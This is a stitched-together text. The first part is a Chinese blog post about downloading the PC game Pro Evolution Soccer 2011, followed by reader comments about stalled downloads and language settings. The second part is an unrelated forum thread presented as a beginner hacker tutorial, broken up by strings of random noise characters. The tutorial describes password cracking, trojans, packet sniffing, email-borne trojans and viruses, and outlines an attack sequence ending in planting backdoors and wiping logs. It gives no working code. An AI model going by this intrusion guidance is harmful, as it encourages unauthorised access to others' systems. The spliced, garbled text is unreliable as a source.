为什么我下载的实况足球2011下载没法安装,下了3.4哥版本…

实况足球 PES2011 中文版下载 (完整硬盘版)
  #160 #160 #160 #160 #160 #160;
终于抢在国庆节前发布了,对足球粉丝来说绝对是一个重磅的国庆礼物了!新一代的实况足球游戏《Pro Evolution Soccer 2011》(以下简称《
》)由大红大紫的巴塞罗那队球星梅西全面担任代言人。
  #160 #160 #160 #160 #160 #160;
加入了新的AI引擎,在防守、门将、动作和球员物理学、比赛节奏、画面、战术策略、设置、在线大师联赛等各方面进行了大幅度的完善和改进,全新的手控力度传球让游戏的整体配合进攻变得更加灵活多变,自由度更高,玩家需要掌控每一次传球、每一个动作从而打出绝妙的配合……
全新的手控力度传球
  #160 #160 #160 #160 #160 #160;
的新改变很多,刚上手时会令人感到非常不熟悉。甚至老手在玩了半小时之后,竟依然需要学习游戏的新操控。改变最大的就是游戏中更加自由的传球方式,这个新的传球方式可以说在根本上改变了《
PES 2011
》的玩法。
  #160 #160 #160 #160 #160 #160; 你需要在很短的时间计算传球的力量、时机和方向,熟悉之后可以打出以往任何实况足球游戏都难以打出的精美传球,更灵活也更符合真实情况。但一开始,几乎所有试玩的人都会一直手忙脚乱,不断地传错球,完全组织不起进攻。手控传球的加入要求我们在操作的时候要更多地思考,这毫无疑问增加了游戏的难度和专业性,至于这个设定是好是坏就见仁见智了。
全新的动作、战术和防守
  #160 #160 #160 #160 #160 #160; 实况足球2011更注重战术和佯攻技巧,进攻火力将更加强大。而这些动作的执行也将更加简化,只需按下LB并移动右摇杆即可做出让防守者望球兴叹的假动作。当你控制梅西或C罗带球时,将可以做出和他们现实中相一致的华丽过人动作!
  #160 #160 #160 #160 #160 #160;
也颠覆了以往的防守概念。FIFA系列前两年开始注重的身体对抗也成为了《PES》中的一部分。按住X键,并移动左摇杆可以让玩家对对方展开“橡皮糖”般的防守,当你松开摇杆时,玩家的球员还会继续穷追不舍一段距离。操纵自己的球员奔向带球的球员,他便可以根据时机的不同进行断球或干脆放倒对方。
总结:
总的来说,这次《
》带来了全新的高自由度的比赛和更加真实的传球模式,使得游戏方式和以往的版本产生了巨大的变化,游戏更贴近真实,玩法更多。不过玩家的确需要一定的适应时间来掌握传球的力量和方向……
PES2011 游戏视频演示:
实况足球2011 配置要求
操作系统 Windows XP SP3, Vista SP2, Windows 7
处理器 Intel Pentium IV 2.4GHz
内存 2GB RAM
显卡 DirectX 9.0c 兼容声卡. 128MB Pixel Shader 3.0 (NVIDIA GeForce 6600 或 AMD ATI Radeon x1300显卡)
游戏***步骤:
1、解压缩,需10G临时空间
2、双击setup.bat开始***
3、用桌面快捷进游戏
4、进游戏后,在主菜单右侧settings里选择语言(本版本为法语解说、文字为法文、英文和繁体中文可选,如喜欢英文语音解说,请单独
由于版权问题,我们将只保留该文章的介绍,不再提供版权文件的下载,对您造成的不便敬请谅解。
属于分类:
本文标签:
流行热度:
正在感受现场气氛...
生产日期:异次纪元 10年09月30日 - 23时31分56秒
文章链接:
] (转载时请注明本文出处及文章链接)
上一篇 :
下一篇 :
还有这些可能你也想看看:
各位正在潜水的同学请注意,有
101 位无聊人士
在异次元附近海域出没!
黑客?小X,这你解决不了?
这位小朋友成功到达火星表面成为外星人,我们要向他看齐!
[2010-09-30 23:51:07] 
周末了,下载来玩玩,hoho~~~
这位小朋友爬上地球陆地成为了无知又愚蠢的人类
[2010-11-19 12:55:31] 
哇咔咔~~下载咔咔啊啊啊啊 啊啊啊啊啊
这位小朋友成功浮上了地球水面...
[2010-09-30 23:52:46] 
前排板凳留名!
这位小朋友蹲在海底10米处游来游去
[2010-10-1 01:05:16] 
黑兔子小八
果断顶起,果断删DEMO
这位小朋友蹲在海底20米处游来游去
[2010-10-1 04:31:45] 
曾大勇
黑客攻击?不过我不玩的,电脑配置也很垃圾的啊,没玩过也许就不会喜欢上吧
这位小朋友蹲在海底30米处游来游去
[2010-10-1 05:29:22] 
Someone
太给力了,貌似英语解说补丁出来了,在3DM看到了~
这位小朋友蹲在海底40米处游来游去
[2010-10-1 08:28:34] 
沉默の格子
给力是虾米意思
这位小朋友蹲在海底50米处游来游去
[2010-10-2 22:07:58] 
vv大夫撒旦法
这位小朋友蹲在海底60米处游来游去
[2010-10-7 00:50:03] 
动感十足啊
这位小朋友蹲在海底70米处游来游去
[2010-10-1 09:23:00] 
下好了
怎么***的
这位小朋友蹲在海底80米处游来游去
[2011-01-2 20:36:31] 
估计用键盘玩会很痛苦
这位小朋友蹲在海底90米处游来游去
[2010-10-1 10:08:21] 
wenyudi
已经舍弃PES,玩FIFA11联网对战的路过
这位小朋友蹲在海底100米处游来游去
[2010-10-1 10:38:19] 
玩了2010的飘过
这位小朋友蹲在海底110米处游来游去
[2010-10-1 11:04:05] 
我玩的是实况足球8. 现在应该与时俱进。下载2011试玩看看如何,再回来点评
这位小朋友蹲在海底120米处游来游去
[2010-10-1 13:41:13] 
来晚了,没有沙发了,不过实况确实比EA做的好
这位小朋友蹲在海底130米处游来游去
[2010-10-1 13:51:50] 
最后一句话看的菊紧。。。
这位小朋友蹲在海底140米处游来游去
[2010-10-1 14:03:28] 
这位小朋友蹲在海底150米处游来游去
[2010-10-1 14:41:49] 
心碎无痕
到了98.6%就不动了
这位小朋友蹲在海底160米处游来游去
[2010-10-1 14:42:55] 
这是偶的最爱啊……
这位小朋友蹲在海底170米处游来游去
[2010-10-1 18:51:54] 
下不动啊下不动….99.0%
这位小朋友蹲在海底180米处游来游去
[2010-10-1 19:16:20] 
…我的是99.9%…
这位小朋友蹲在海底190米处游来游去
[2010-10-5 18:04:55] 
看起来技术要求很高啊
女生还是果断放弃了
这位小朋友蹲在海底200米处游来游去
[2010-10-1 20:47:09] 
希望能多推荐一些ipad软件,最好是免费的,这样我会更爱异次元的!
这位小朋友蹲在海底210米处游来游去
[2010-10-1 20:58:40] 
这个不顶不行。。。。我等着下完赶紧试。。。本子跑2010的时候风扇拼命转,这个肯定好不了。。难道要去换个alie 。。。。
这位小朋友蹲在海底220米处游来游去
[2010-10-1 21:40:49] 
babydevil
有NBA2011没啊,其实游戏的话在这下的人应该不是很多
这位小朋友蹲在海底230米处游来游去
[2010-10-1 22:35:41] 
我怎么设置不了繁体中文?求解
这位小朋友蹲在海底240米处游来游去
[2010-10-2 05:58:59] 
再下一个中文补丁 用百度搜一下 我下了一个OK了 只是球员仍是英文名
这位小朋友蹲在海底250米处游来游去
[2010-10-4 00:18:48] 
Norman07
PES2010死忠路过···
这位小朋友蹲在海底260米处游来游去
[2010-10-2 09:01:28] 
要修改器的可以去我博客。
这位小朋友蹲在海底270米处游来游去
[2010-10-2 11:52:43] 
繁体中文?求解
这位小朋友蹲在海底280米处游来游去
[2010-10-2 16:23:18] 
メ咖啡牛奶
终于出来了…
这位小朋友蹲在海底290米处游来游去
[2010-10-2 17:19:53] 
我就等着六维上下,哪位能在那儿做个种么?
这个月网费还没付
这位小朋友蹲在海底300米处游来游去
[2010-10-2 19:02:16] 
很久没有玩了。。
这位小朋友蹲在海底310米处游来游去
[2010-10-3 16:16:01] 
没法选中文啊
这位小朋友蹲在海底320米处游来游去
[2010-10-3 23:24:32] 
还在玩2010,呵呵
这位小朋友蹲在海底330米处游来游去
[2010-10-4 12:31:41] 
一把破剑
我的下到99.9%
不动了
这位小朋友蹲在海底340米处游来游去
[2010-10-4 17:22:21] 
命格无双
就向他们说的,下到99%,就下不了了
这位小朋友蹲在海底350米处游来游去
[2010-10-4 21:33:53] 
MYtinus
很好!
这位小朋友蹲在海底360米处游来游去
[2010-10-4 22:19:47] 
神马电灯泡
我的机子是dell-531s的能激活Windows7吗?
这位小朋友蹲在海底370米处游来游去
[2010-10-5 01:42:50] 
神马电灯泡
sorry,我不该在这问的。
这位小朋友蹲在海底380米处游来游去
[2010-10-5 01:47:22] 
百度去搜一个激活器就OK了
这位小朋友蹲在海底390米处游来游去
[2010-10-7 23:08:52] 
很好很强大 第一次玩到这么好的游戏 太高兴了
这位小朋友蹲在海底400米处游来游去
[2010-10-6 13:14:15] 
风行者
为什么下载到98.6%就不动了,请各位大侠尽快解决啊,拜托了!
这位小朋友蹲在海底410米处游来游去
[2010-10-6 15:23:40] 
强心剂。ept的2011子论坛都挤爆了,想下载没机会。这下爽了!
这位小朋友蹲在海底420米处游来游去
[2010-10-6 17:34:39] 
风行者
我一直很支持你们的,快点解决下不了的问题吧
这位小朋友蹲在海底430米处游来游去
[2010-10-6 19:55:19] 
风行者
难道站长太忙了吗?快点答复我吧,我下载到98.6%就下不动了!救命啊!我要疯了!
这位小朋友蹲在海底440米处游来游去
[2010-10-7 07:39:25] 
下到%99然后又变成%98.6然后到了%99.3又变成%99然后又是%98.6
我要疯了
这位小朋友蹲在海底450米处游来游去
[2010-10-7 23:07:22] 
你的问题解决了吗?我也遇到相同问题
这位小朋友蹲在海底460米处游来游去
[2010-10-9 22:05:14] 
哈哈,真想玩一下。
这位小朋友蹲在海底470米处游来游去
[2010-10-8 23:25:50] 
砸下不了呢
这位小朋友蹲在海底480米处游来游去
[2010-10-9 11:55:37] 
设置不了中文的啊。求解。
这位小朋友蹲在海底490米处游来游去
[2010-10-9 12:35:57] 
到98.8%就不动的?谁能解决?
这位小朋友蹲在海底500米处游来游去
[2010-10-9 22:00:00] 
我的下到99.8就不动了
这位小朋友蹲在海底510米处游来游去
[2010-10-9 22:01:44] 
太给力了,不再是几kb,几kb的爬了
这位小朋友蹲在海底520米处游来游去
[2010-10-10 02:16:30] 
Because
时代大趋势,异次元居然不提供PC神作FIFA11下载而提供没落的PES?
这位小朋友蹲在海底530米处游来游去
[2010-10-11 04:47:03] 
east_life
***中文补丁的时候为虾米提示找不到pes2011呢。。。
这位小朋友蹲在海底540米处游来游去
[2010-10-15 18:07:23] 
east_life
啊。。不是,中文补丁居然是2010的。。
这位小朋友蹲在海底550米处游来游去
[2010-10-15 18:09:00] 
Frank_HJY
实况已经没FIFA做的好了~玩过实况11和FIFA11,个人感觉FIFA更好~
这位小朋友蹲在海底560米处游来游去
[2010-10-16 01:24:12] 
王博shmt
首先佩服小x。嘿嘿,已经在异次元潜水很久了。
98.9%到99.1%,来回跳。都两天了~~~~~
这位小朋友蹲在海底570米处游来游去
[2010-10-16 08:52:42] 
10GB的空间,太大了,小本本有点吃不消,期待精简版。
这位小朋友蹲在海底580米处游来游去
[2010-10-17 20:21:36] 
李乾隆
你好~~~我下了怎么不是中文的在游戏里面找也没找到
这位小朋友蹲在海底590米处游来游去
[2010-10-20 10:18:08] 
很好。虽然我不喜欢足球= =
想玩,可是笔记本上已经满了,谁来救救我吧……
这位小朋友蹲在海底600米处游来游去
[2010-10-22 15:21:19] 
柒_色
弄了后 桌面没快捷方式啊?
这位小朋友蹲在海底610米处游来游去
[2010-10-24 12:51:50] 
梦轩辕
键盘没法玩了,2011以后别想用键盘玩起来!
这位小朋友蹲在海底620米处游来游去
[2010-10-25 19:55:21] 
10G 啊?太大了。
这位小朋友蹲在海底630米处游来游去
[2010-11-6 18:48:57] 
求救啊!下载99.2%不动了 怎么办啊?
这位小朋友蹲在海底640米处游来游去
[2010-11-16 21:09:38] 
我都不知道怎么装补丁
这位小朋友蹲在海底650米处游来游去
[2010-12-8 20:59:27] 
妈的 ,下到99.9%就不动了 !fuck you
这位小朋友蹲在海底660米处游来游去
[2010-12-10 14:01:27] 
proce PS3的手柄连接到USB接口上能玩PC版PES2011吗?
这位小朋友蹲在海底670米处游来游去
[2010-12-14 12:57:54] 
忽悠啊 到99.9下载不动了
这位小朋友蹲在海底680米处游来游去
[2010-12-14 17:15:41] 
好东西
这位小朋友蹲在海底690米处游来游去
[2010-12-20 12:59:24] 
运行游戏怎么界面就是左下脚个圈圈在转…进不了游戏。。。都等了办小时还这样?高手叫下 啊~!!!!!
这位小朋友蹲在海底700米处游来游去
[2010-12-28 17:59:12] 
解说是什么语言的
这位小朋友蹲在海底710米处游来游去
[2011-01-2 21:00:04] 
安泽桐
你暂停 在双击
冲刺一下就可以了
中文怎么设置啊
这位小朋友蹲在海底720米处游来游去
[2011-01-7 15:42:04] 
setting里没有看到有中文啊,只有英文和法文,还有一个不知道什么文,没有看到chinese啊?
这位小朋友蹲在海底730米处游来游去
[2011-01-7 19:03:24] 
FIFA系列前两年开始注重的身体对抗也成为了《PES》中的一部分,这句话让我笑抽了,你玩过实况吗??脑残!
这位小朋友蹲在海底740米处游来游去
[2011-03-15 12:16:23] 
阿呆我才、
这位小朋友蹲在海底750米处游来游去
[2011-03-30 19:40:35] 
陶永生
这位小朋友蹲在海底760米处游来游去
[2011-03-31 07:15:40] 
听好的游戏
这位小朋友蹲在海底770米处游来游去
[2011-04-6 20:36:27] 
没怎么去玩~~~·
这位小朋友蹲在海底780米处游来游去
[2011-05-4 09:36:48] 
塔木坨
这位小朋友蹲在海底790米处游来游去
[2011-05-4 22:01:00] 
貌似要回复才能下吗
这位小朋友蹲在海底800米处游来游去
[2011-05-8 12:16:09] 
碎石元素
这是啥玩意`
这位小朋友蹲在海底810米处游来游去
[2011-05-8 13:28:15] 
昏死了
为什么不能下
这位小朋友蹲在海底820米处游来游去
[2011-05-11 22:37:02] 
玩了2010的飘过
这位小朋友蹲在海底830米处游来游去
[2011-05-12 05:47:59] 
`_KaIseR
这位小朋友蹲在海底840米处游来游去
[2011-05-12 10:57:46] 
我啊我啊
我想玩玩看
这位小朋友蹲在海底850米处游来游去
[2011-05-15 00:41:21] 
看看看
这位小朋友蹲在海底860米处游来游去
[2011-05-16 16:27:36] 
这位小朋友蹲在海底870米处游来游去
[2011-05-19 00:48:17] 
这位小朋友蹲在海底880米处游来游去
[2011-06-6 20:51:41] 
看看能不能玩
这位小朋友蹲在海底890米处游来游去
[2011-06-14 11:54:54] 
位小朋友蹲在海底890
这位小朋友蹲在海底900米处游来游去
[2011-06-24 09:09:50] 
我要下
这位小朋友蹲在海底910米处游来游去
[2011-06-25 11:06:39] 
dg6+5yr+j6h
这位小朋友蹲在海底920米处游来游去
[2011-07-8 22:27:01] 
yujunli
我下不下来
这位小朋友蹲在海底930米处游来游去
[2011-07-13 14:08:40] 
好东西
这位小朋友蹲在海底940米处游来游去
[2011-07-19 14:42:23] 
好东西
这位小朋友蹲在海底950米处游来游去
[2011-07-27 12:25:05] 
好好好
这位小朋友蹲在海底960米处游来游去
[2011-07-27 16:23:38] 
吴奇隆
顶啊!!!!!
这位小朋友蹲在海底970米处游来游去
[2011-08-1 18:12:21] 
2011实况
这位小朋友蹲在海底980米处游来游去
[2011-08-4 10:31:09] 
小X的哥哥的同学的老师的儿子的妈妈养的小猫的表弟的主人的朋友说看帖不回会被鄙视de
你的大名 (*必填) :
E-Mail (*必填):
你的网站 (可选填):
评论内容 (*必填):
(Ctrl + Enter 快速提交) 本月不被践踏最不舒服的文章:
Most Read Posts
热度 24133 ℃ 热度 24243 ℃ 热度 24984 ℃ 热度 26701 ℃ 热度 27911 ℃ 热度 28536 ℃ 热度 30541 ℃ 热度 32358 ℃ 热度 34716 ℃ 热度 34742 ℃ 热度 37109 ℃ 热度 38118 ℃ 热度 39853 ℃ 热度 42982 ℃ 热度 45231 ℃ 热度 55612 ℃ 热度 58516 ℃ 热度 93708 ℃ 热度 126541 ℃ 热度 138036 ℃ 异次元の宝藏
Categorys
随便找点东西来看看:
Random Posts
某人华丽地飘过的同时说:
Recent Comment
已被留下
个脚印了
好东西 收藏了
异次元
多么神奇的地方
这页面有点乱,不过很有个性,支持一下
请大家帮帮忙
我家的使命召唤7 第6关 和队长推墙进去这后怎么是黑屏
NOD还米到期。。
观望中。。
我说呢,当时看大冲锋的时候那么眼熟。。
BS迅雷~
Twitter
推特(微薄始祖)
小x的帖越来越水了
互联网在不断的演变着
标签云集
Tag Cloud
值得推荐一下
Recommend Products
伟大的赞助商
Contact
Navigation
Partners
异次元软件世界,简称异次元,是一个致力于推广各种优秀实用软件、网络资源的个人博客。站长 X-Force 是一位长期关注 软件、互联网、移动应用与各种开发技术 的IT爱好者,建立本站旨在与更多人分享使用电脑的快乐与精彩!
本站持续修改完善中,如遇不便还请谅解....
版权归
技术构建
本站使用登录 只需一步,快速开始
一 #27493 #25630 #23450;
当前离线
阅读权限
注册时间
2008-4-4
最后登录
2009-11-12
在线时间
2363 小时
甲级联赛职业球员, 积分 24609, 距离下一级还需 10391 积分
该用户从未签到
1444 点
发表于 2008-4-26 14:50:45
[全][黑客]菜鸟学习初级教程-----强烈推荐(看完后成黑客拉)
: e8 N$ k; \+ q; s( ? H, I+ Y7 p5 N
# ]/ s! ~! H. h+ X
7 e: J; ` R! O
8 _! s) H# U+ }3 ~, K
据说看完的人10个有9个成了黑客
+ O% Q8 H3 e, k9 i
还有一个是BC
& `: g# m7 e3 Q: C; z# _- r4 z( Z
% _" ]+ F1 s4 T: Y7 B1 Y# i
. Q- w! f: A9 k; z4 Y$ \8 K
, v$ V7 r) t$ p, q
: D5 m, N3 }1 v: u
0 d0 l5 ~' D0 c/ c( @7 p
2 I+ w5 }* d) j1 |) E
# Q/ Y" d4 ~: @$ G! n
# Q0 m; l+ W+ `8 S! b$ e5 M
然而看完的人
8 Y$ w: W2 n/ W
视力全下降1度
当前离线
阅读权限
注册时间
2008-4-4
最后登录
2009-11-12
在线时间
2363 小时
甲级联赛职业球员, 积分 24609, 距离下一级还需 10391 积分
该用户从未签到
1444 点
发表于 2008-4-26 14:51:01
个黑客的基本技能
3 _8 c9 O1 d. K8 J& |
' `) B: i5 t Q
1、黑客的精神态度是很重要的,但技术则更是重要。黑客的态度虽然是无可取代,随著新科技的发明和旧技术的取代,这些工具随时间在慢慢的改变。例如:以往总是会学会用机器码写程序,直到最近我们开始使用HTML。不过,在1996年末,当然,这是基础的hacking技能。在1997年,理所当然的,你必须学会C。但,如果你只是学一种语言,那么你不能算是一位黑客,了不起只能算是一个programmer。除此,你还必须学会学会以独立于任何程序语言之上的概括性观念来思考一件程序设计上的问题。要成为一位真正的黑客,你必须要能在几天之内将manual内容和你目前己经知道的关连起学会一种新的语言。也就是说,你必会学还了C之外的东西,你至少还要会LISP或Perl(Java也正在努力的挤上这个名单; 译者注: 我很怀疑这份名单)。除了几个重要的hacking常用语言之外,这些语言提供你一些不同的程序设计途径,并且让你在好的方法中学习。
2 d) a z) k, `% Y _1 i, e: b6 k+ d, f/ O$ P
程序设计是一种复杂的技术,我没辨法在这提供完整的学习步骤。但是我能告诉你一些在书本上和课堂上所没有的东西(有很多,几乎全部最好的黑客们都是自习而来的)。(a) 读别人的程序码;(写程序,这两项是不错的方法。学习写程序就像在学习写一种良好的自然语言,最好的方法是去看一些专家们所写的东西,然后写一些你自己的东西,然后读更多,再写更多。然后一直持续,一直到你发展出一种属于自己的风格和特色。要找到好的程序码来看是很一件很困难的事,因为,对菜鸟黑客们而言,适于供他们阅读和努力的大型程序的source数量很少。但这事己有了戏剧性的变化了; 现在免费的供应的软件、程序设计工具和操作系统(大都公开提供 source,而且全都是由黑客们写成的)到处可看。进入下一个主题。
) t) C: D W: f
- w/ ~# [8 I& g3 T( W+ m+ r
2、取得一个免费的 UNIX,并学习使用和维护。我先假设你己经有一部个人电脑或者是可以使用任何一部(现在的小孩子真幸福,可如此轻易的拥有
))。 取得黑客技巧的第一个步骤是取得一份Linux 或者一份免费的 BSD-Unix,并将它***在自己的机器,并使之顺利的运作。没错,在这个世界上除了Unix之外,还有其它的操作系统。但是他们只提供bianry,你不能看到他们的程序码,你也不能修改他们。想要在DOS或Windows或MacOS开始hacking,无疑就是要你绑著枷锁跳舞一样。
4 }4 [# Y/ I& E" Z6 f# \
( Y7 k ( v, b, K
除此之外,Unix是Internet上的操作系统。当你在不懂Unix的情况下学习使用Internet时,你没辨法在不懂Unix的情况下成为 Internet的黑客。因为这个原故,现在的黑客文化还是很牢固的以Unix为中心。(这并不完全是正确的,而且有些活在旧时代的黑客甚至也不喜欢这种情形,但是Unix和Internet之间的共生共成己经到了牢不可破的地步,即使是Microsoft的大块肌肉也没能在上面留下明显的伤痕。) 因些,把Unix装起来吧! (我自己是喜欢Linux,但是还有其它的东东可用。) 学习它,让它运作起来,让它陪你努力精进。用他向整个Internet喊话。看程序码,改程序。
- ~ U/ t6 R- z5 X3 p
# U: s" [2 ]. y1 _# e
有一天你成为一位高竿的黑客,你回头往后看时会发现,你得到比 Microsoft操作系统所能提供的还要好的程序设计工具(包括 C,Li 和 Perl)。而且得到快乐,并学到比共生共成己经到了牢不可破的地步,即使是Microsoft的大块肌肉也没能在上面留下明显的伤痕。) 因些,把Unix装起来吧! (我自己是喜欢Linux,但是还有其它的东东可用。) 学习它,让它运作起来,让它陪你努力精进。用他向整个Internet喊话。看程序码,改程序。有一天你成为一位高竿的黑客,你回头往后看时会发现,你得到比Microsoft操作系统所能提供的还要好的程序设计工具(包括 C,Li 和 Perl)。而且得到快乐,并
/ J. S& t: ?+ O, F
学到比你想像中的还要多的知识。关于学习Unix,在Loginataka有更多的资料。(
, R( P# G9 u. F: U
看一下Linux distribution的目录或 Linux CD,并把自己交付给它。
+ k: I5 b4 k2 v) @+ z# F$ D8 |( ?
3 p- ]/ p* y, P! }2 P! t
3、学习使用World Wide Web并学会写 HTML。
+ D( t7 R: J2 ?; _. J9 V
在黑客文化创造出来的东西,大多在他们的活动范围外被使用著,如,在工厂和辨公室或大学被漠漠的使用著。但Web是一个很大的例外,这个黑客眼中的大玩具甚至还被政客们接受,并巧巧的在改变这个世界。因此(还有很多好的理由),你必须学习Web。并不只是学习使用browser(这太容易了)而己,还要学会写HTML这个Web的标签语言。如果你不知道如何设计程序,写HTML也可以给一些习惯上的帮助。嗯!! 建立home page吧! 不过,有一个home page 并没任何特别之处能让你成为一位黑客。Web上到处都是home page,而且大部份都没什么重点,没什么内容的烂泥 -- 很好看的烂泥巴,但是看起来都一样,差不多。
" t* X9 c6 T+ m; W. ^3 y
; B& g3 Y$ K# V( Q
4、至少学会以下的其中两种:
5 t, Q( Z! P& _8 @) f4 R
一、网站服务器程序ASP、PHP、CGI、jsP
' G1 u8 T6 f& Z. G& Z* `8 K4 X# S' U
我个人认为CGI是最难学的其中一种。
6 i) ^5 f' [" j+ G$ j! Q* O+ D- X$ X
二、程序语言:C语言、C++、VB、J***A、PERL、DELPHI、汇编语言
8 l0 d$ {$ m# ~9 u
不过我认为C语言的通用性最好,可以跨平台(操作系统)使用。
$ w. I4 e1 B& o1 T
还要试着自己写程序、开发软件等工作。
" Y) J9 c4 c5 k& p5 B) w
三、数据库管理软件:MYSQL、SQL、FOXPRO……等。 {7 P/ P! E# K7 d9 |
四、几种常用的操作系统:WIN98、WIN2000、WINNT、WINXP、UNIX、LINUX、要是能学到UNIX那是最好不过的了。最最基本的WIN2K、WINNT也要学会吧。
5 b+ E& F, f9 t" h- o7 L! |
如果以上的你都会了,那么你已经是个高手了。
当前离线
阅读权限
注册时间
2008-4-4
最后登录
2009-11-12
在线时间
2363 小时
甲级联赛职业球员, 积分 24609, 距离下一级还需 10391 积分
该用户从未签到
1444 点
发表于 2008-4-26 14:51:20
黑客初级技术讲解(上)
; J$ O4 c9 S+ e3 T/ y* ~
+ C" w: d* _7 z P9 z/ z
网络安全从其本质上来讲就是网络上的信息安全。从广义来说,凡是涉及到网络上信息的保密性、完整性、可用性、真实性和可控性的相关技术和理论都是网络安全的研究领域。确保网络系统的信息安全是网络安全的目标,信息安全包括两个方面:信息的存储安全和信息的传输安全。信息的存储安全是指信息在静态存放状态下的安全,如是否会被非授权调用等。信息的传输安全是指信息在动态传输过程中安全。为了确保网络信息的传输安全,有以下几个问题:
/ ~. D& h1 X3 m) z7 \2 g
6 j$ m q/ U( j, b$ _& R- Z0 _5 P* Z
  (1)对网络上信息的***
, ` M/ p1 e8 G+ u& \
  (2)对用户身份的仿冒
' d0 H" ?; j( `$ D, y( a
  (3)对网络上信息的篡改
: P) V& B2 u4 _/ ]8 l* K6 b
  (4)对发出的信息予以否认
. m% g% o$ z" ?! M/ N# ?8 ?2 y
  (5)对信息进行重发
8 q" s* Y7 i# r8 D$ ]$ a
" z# v$ Z$ k! }: L+ n# X5 Q
  对于一般的常用入侵方法主要有 k: N i8 g6 R5 K3 G( R o& t
* b* W8 u9 C+ u; Z3 E
  1.口令入侵
0 f# x; }" x5 B( e7 E
! _) ?+ @ C3 i: P
  所谓口令入侵,就是指用一些软件解开已经得到但被人加密的口令文档,不过许多黑客已大量采用一种可以绕开或屏蔽口令保护的程序来完成这项工作。对于那些可以解开或屏蔽口令保护的程序通常被称为“Crack”。由于这些软件的广为流传,使得入侵电脑网络系统有时变得相当简单,一般不需要很深入了解系统的内部结构,是初学者的好方法。
, ^# u5 r7 m2 [3 h+ } e& H( k$ [
  2.特洛伊木马术
3 Q( W: R% {- {4 \8 p
: s$ [# h7 s" W& [& B4 S0 q5 Y
  说到特洛伊木马,只要知道这个故事的人就不难理解,它最典型的做法可能就是把一个能帮助黑客完成某一特定动作的程序依附在某一合法用户的正常程序中,这时合法用户的程序代码已被该变。一旦用户触发该程序,那么依附在内的黑客指令代码同时被激活,这些代码往往能完成黑客指定的任务。由于这种入侵法需要黑客有很好的编程经验,且要更改代码、要一定的权限,所以较难掌握。但正因为它的复杂性,一般的系统管理员很难发现。
; N( @/ j$ G. {5 d: W
8 q' y3 w" T B- f3 @$ ~- ]# i
  3.***法
7 |" `) X& _2 p( t5 d4 m) P9 t8 X- g. V
6 M/ _$ t) A) C$ R/ @6 h" ~6 b
  这是一个很实用但风险也很大的黑客入侵方法,但还是有很多入侵系统的黑客采用此类方法,正所谓艺高人胆大。
9 Z U' F& e, s1 n) ^8 Z
: x6 e1 m- r# \8 c" a
  网络节点或工作站之间的交流是通过信息流的转送得以实现,而当在一个没有集线器的网络中,数据的传输并没有指明特定的方向,这时每一个网络节点或工作站都是一个接口。这就好比某一节点说:“嗨!你们中有谁是我要发信息的工作站。”
) E7 t6 p% M' C6 v9 y- K
$ e: O& W0 n: [" A% S0 |% O
  此时,所有的系统接口都收到了这个信息,一旦某个工作站说:“嗨!那是我,请把数据传过来。”联接就马上完成。
5 ]( B* q0 \# I4 W8 Y, v0 a. w
% h/ E/ e: w' ^. E5 b
  目前有网络上流传着很多嗅探软件,利用这些软件就可以很简单的***到数据,甚至就包含口令文件,有的服务在传输文件中直接使用明文传输,这也是非常危险的
3 E; k3 k% A3 ^4 w
4.E-mail技术
6 q8 H) b8 Y: `9 r. }
! R% `3 O# ~- Z6 E+ ^( V
  使用email加木马程序这是黑客经常使用的一种手段,而且非常奏效,一般的用户,甚至是网管,对网络安全的意识太过于淡薄,这就给很多黑客以可乘之机。
9 f3 _ V. z6 D- j2 k) b: t$ K
7 J9 G N3 R0 c) S4 O d) M
  5.病毒技术
: d" l7 h! e$ q+ y
  作为一个黑客,如此使用应该是一件可耻的事情,不过大家可以学习,毕竟也是一种攻击的办法,特殊时间,特殊地点完全可以使用。
; H& j* c! j+ A ?& \& K7 }" a
" O" k$ u, ?, S: x! k
  6.隐藏技术
) r5 {: p6 c+ L
* c% a$ Q/ o3 p) b+ D' z% s
  网络攻击的一般步骤及实例
+ n, b4 A9 T4 {. B
+ R* f; `5 ~+ W0 ]' p3 Z
  攻击的准备阶段
( z1 Y7 q7 u [( S/ a: a! |% U" \
6 J+ ` r. V: n
  首先需要说明的是,入侵者的来源有两种,一种是内部人员利用自己的工作机会和权限来获取不应该获取的权限而进行的攻击。另一种是外部人员入侵,包括远程入侵、网络节点接入入侵等。本节主要讨论远程攻击。
3 O9 N. u( S7 g& O* v
4 E- N, V0 a3 c, z2 G1 C
  进行网络攻击是一件系统性很强的工作,其主要工作流程是:收集情报,远程攻击,远程登录,取得普通用户的权限,取得超级用户的权限,留下后门,清除日志。主要内容包括目标分析,文档获取,破解密码,日志清除等技术,下面分别介绍。
7 _9 a$ P2 Z+ E; u; Q6 T* l0 b
9 v r3 F, _1 R/ ]
  1.确定攻击的目的
- l2 b8 \- ^/ Q3 V* n- B. H
( ]: h6 f5 e" T
  攻击者在进行一次完整的攻击之前首先要确定攻击要达到什么样的目的,即给对方造成什么样的后果。常见的攻击目的有破坏型和入侵型两种。破坏型攻击指的只是破坏攻击目标,使其不能正常工作,而不能随意控制目标的系统的运行。要达到破坏型攻击的目的,主要的手段是拒绝服务攻击(Denial Of Service)。另一类常见的攻击目的是入侵攻击目标,这种攻击是要获得一定的权限来达到控制攻击目标的目的。应该说这种攻击比破坏型攻击更为普遍,威胁性也更大。因为黑客一旦获取攻击目标的管理员权限就可以对此服务器做任意动作,包括破坏性的攻击。此类攻击一般也是利用服务器操作系统、应用软件或者网络协议存在的漏洞进行的。当然还有另一种造成此种攻击的原因就是密码泄露,攻击者靠猜测或者穷举法来得到服务器用户的密码,然后就可以用和真正的管理员一样对服务器进行访问。
' S' R% v4 h% p) n5 M2 }0 ?5 T
6 y$ q1 U: g; G# k9 W6 r, x/ E
  2.信息收集
, {% j7 p% O3 J* g' f" X" ] q/ |! U
5 Q9 k) V) `7 Z, N9 a
  除了确定攻击目的之外,攻击前的最主要工作就是收集尽量多的关于攻击目标的信息。这些信息主要包括目标的操作系统类型及版本,目标提供哪些服务,各服务器程序的类型与版本以及相关的社会信息。
4 Y4 t6 A! \0 n% X
/ Z \- l0 T0 P. x* l2 f5 k4 L
  要攻击一台机器,首先要确定它上面正在运行的操作系统是什么,因为对于不同类型的操作系统,其上的系统漏洞有很大区别,所以攻击的方法也完全不同,甚至同一种操作系统的不同版本的系统漏洞也是不一样的。要确定一台服务器的操作系统一般是靠经验,有些服务器的某些服务显示信息会泄露其操作系统。例如当我们通过TELNET连上一台机器时,如果显示
# v# J8 q* _; _6 L: N' m# T2 l
; Y! K* P2 R0 b. S
  Unix(r)System V Release 4.0
& G, d/ g! ^7 Y4 ?' |0 ]5 h
  login:
